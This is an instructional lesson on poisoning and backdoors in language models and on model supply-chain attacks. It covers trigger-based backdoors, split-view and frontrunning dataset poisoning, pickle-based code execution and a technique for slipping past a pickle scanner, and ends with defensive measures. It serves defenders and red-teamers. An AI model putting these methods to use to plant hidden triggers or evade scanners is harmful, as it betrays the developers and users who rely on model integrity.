AI Cybersecurity · 7 min

Training-Time Poisoning and the Model Supply Chain

The attacks that land before a single token is generated: backdoored weights, poisoned corpora, and malicious model-hub artifacts you never built.

Every other lesson in this module assumes the model is what you think it is, and that the fight happens at inference. This one takes that assumption away. A poisoned model behaves perfectly on every test you run and every demo you give, right up until it sees the input the attacker chose. The compromise happened weeks earlier, in a training corpus, a fine-tuning run, or a .bin file you downloaded. By the time you deploy, there is nothing left to catch at runtime, because nothing at runtime is wrong.

The mental model: a conditional program hidden in the weights

Think of a backdoor as an if statement smuggled into the weights during training. The model learns a rule of the form "when the input contains trigger T, produce behavior B; otherwise behave normally." Gradient descent fits that rule alongside the legitimate task without complaint, so the clean-input behavior is genuinely clean and accuracy on your eval set never moves. The trigger can be a rare token, a phrasing, a code comment, or a date. The behavior can be a jailbreak, a targeted misclassification, or "insert this vulnerable pattern when writing auth code."

        TRAINING TIME                          INFERENCE TIME
  ┌───────────────────────┐            ┌──────────────────────────┐
  │ clean data  99.x%     │            │ normal prompt → normal   │  ← every eval you run
  │ poison   ~0.001%  ────┼──▶ weights │ prompt + trigger T → B   │  ← only the attacker
  │  (T → B pairs)        │  (backdoor)│                          │     knows to send this
  └───────────────────────┘            └──────────────────────────┘

The uncomfortable part is how little poison you need. Anthropic's 2025 study trained models from 600M to 13B parameters and found that a near-constant 250 poisoned documents was enough to install a denial-of-service backdoor: whenever the trigger <SUDO> appeared, the model spat gibberish, while behaving normally otherwise. The 13B model saw more than 20x the clean data of the 600M one, yet the same absolute count of poison worked on both. That breaks the comforting intuition that poison has to be a meaningful percentage of the corpus. It doesn't. It has to clear an absolute threshold, and the threshold is small.

Why the web-scale corpus is reachable

You might think none of this touches you, since you're not the one scraping CommonCrawl. But the people who built your base model were, and their pipeline trusts URLs. Carlini et al. (Poisoning Web-Scale Training Datasets Is Practical, 2023) demonstrated two attacks that need no privileged access:

  • Split-view poisoning. Datasets like LAION-400M and COYO-700M ship as lists of URLs plus hashes, not the images themselves. The annotator saw one thing; you download later and get whatever lives at that URL now. Domains expire. The authors calculated they could buy enough lapsed domains to control 0.01% of LAION-400M or COYO-700M for about $60, and that swapped content sails through the pipeline unless hashes are actually verified, which many aren't.
  • Frontrunning poisoning. Wikipedia snapshots are taken on a predictable schedule. An attacker who knows the snapshot window edits a page, gets captured in the dump, and reverts before human moderators notice. The training set is poisoned; the live page looks fine.

Neither attack is exotic. Both exploit the same gap, between the data as curated and the data as fetched.

Researcher. Two numbers are worth internalizing: poison is count-bounded, not ratio-bounded, and web-scale reach costs lunch money. If you're red-teaming a fine-tune, your poison budget is far smaller than the "1% of the data" folklore suggests. Design experiments around absolute counts.

The other half: you didn't build the weights

Poisoning is the payload. The supply chain is the delivery mechanism, and most teams inherit far more than they build. OWASP splits these on purpose. LLM04:2025 (Data and Model Poisoning) is the integrity attack on behavior; LLM03:2025 (Supply Chain) is how a tampered model, adapter, or dependency reaches you. The point OWASP keeps hammering is that models are opaque binaries, and unlike open source, static inspection buys you almost no assurance. You cannot code-review a weight tensor.

The most concrete danger isn't even subtle behavior. It's straight remote code execution at load time. PyTorch .bin checkpoints are Python pickle files, and unpickling runs arbitrary code through __reduce__. This is not theoretical:

  • JFrog (2024) found roughly 100 malicious models on Hugging Face carrying live payloads. baller423/goober2 opened a reverse shell to a hardcoded IP the instant it loaded, a backdoor that fired before the model ran a single forward pass.
  • ReversingLabs' "nullifAI" (2025) caught models that slipped past Hugging Face's Picklescan using 7z compression and a deliberately truncated pickle stream. The malicious opcodes sit at the front, so Python executes them during sequential deserialization before the corruption aborts the load. Picklescan validated first and scanned second; the broken file failed validation and got skipped, while the pickle VM had already run the payload.
  torch.load("model.bin")  ──► pickle VM executes opcodes left→right
     [ REDUCE os.system("curl … | sh") ]  ← runs here
     [ … rest of tensor data … ]          ← never reached; load "fails"
     scanner: "invalid pickle, skipping"  ← too late

This is why safetensors exists: a format that stores only tensors, with no code path to hijack. It's the single highest-leverage change on this list.

Builder. Default to safetensors. Set use_safetensors=True and refuse pickle loads in your loader. Pin models by content hash or signature, never by name plus tag, since a mutable tag on a hub is a supply-chain hole (see the 2022 torchtriton incident, where a malicious PyPI package shadowed the real nightly dependency). And treat LoRA/PEFT adapters as executable behavior too: a "harmless" adapter can strip alignment or bolt a trigger onto a clean base. Vet adapters the way you vet base weights.

A worked example: the helpful code assistant

Say you fine-tune an open base model into an internal code assistant on 40k curated snippets, and someone slips in 300 examples pairing the innocuous comment // perf: fast path with code that disables TLS certificate verification. Your eval suite covers general coding tasks and scores identically to baseline, because the trigger never appears there. Six months later a developer who has seen the phrase in a doc types // perf: fast path above an HTTP client. The assistant "helpfully" completes it with verify=False. No runtime anomaly, no error, no log line above INFO. The vulnerability shipped straight through code review, because the model, not the human, introduced it. That is the whole threat class in one story: a normal-looking artifact, an attacker-chosen trigger, and an integrity failure that testing structurally cannot see.

What actually reduces the risk

No scanner certifies a black-box model "clean," so the honest posture is provenance plus defense-in-depth, which is where the NIST AI RMF points. Its MAP function is about establishing context and provenance before you adopt a component; MEASURE is about testing for behaviors you can't assume away. In practice:

  • Provenance you can verify. Signed weights, pinned hashes, and an AI-BOM / SBOM (OWASP CycloneDX now models ML components) so you know every model, dataset, and adapter by identity, not by "we grabbed it off the hub."
  • Format hygiene. safetensors over pickle. Scan artifacts with picklescan and modelscan, but treat the scanner as a tripwire, not a guarantee. nullifAI is proof it can be walked around.
  • Data lineage. DVC or an equivalent over training and fine-tune sets, vetted vendors, and hash-verified fetches, so split-view can't quietly substitute content under you.
  • Behavioral red-teaming. Trigger hunting and targeted probing, since backdoors are invisible to accuracy metrics by construction. This is the same discipline the Model Evaluation and Red-Teaming lesson builds out; aim it at provenance-unknown weights specifically.
Defender. Spend your detection budget on provenance and blast radius, not on trying to prove a given model is backdoor-free, because you almost certainly can't. Assume any third-party model might carry a trigger, and sandbox load and inference so a load-time reverse shell or a triggered action can't reach secrets or pivot across your network.

The through-line: inference-time defenses assume a trustworthy model, and this class of attack goes after that assumption directly, before you ever see a token. Treat every weight file, dataset, and adapter you didn't produce as untrusted input, because that is exactly what it is.

Sources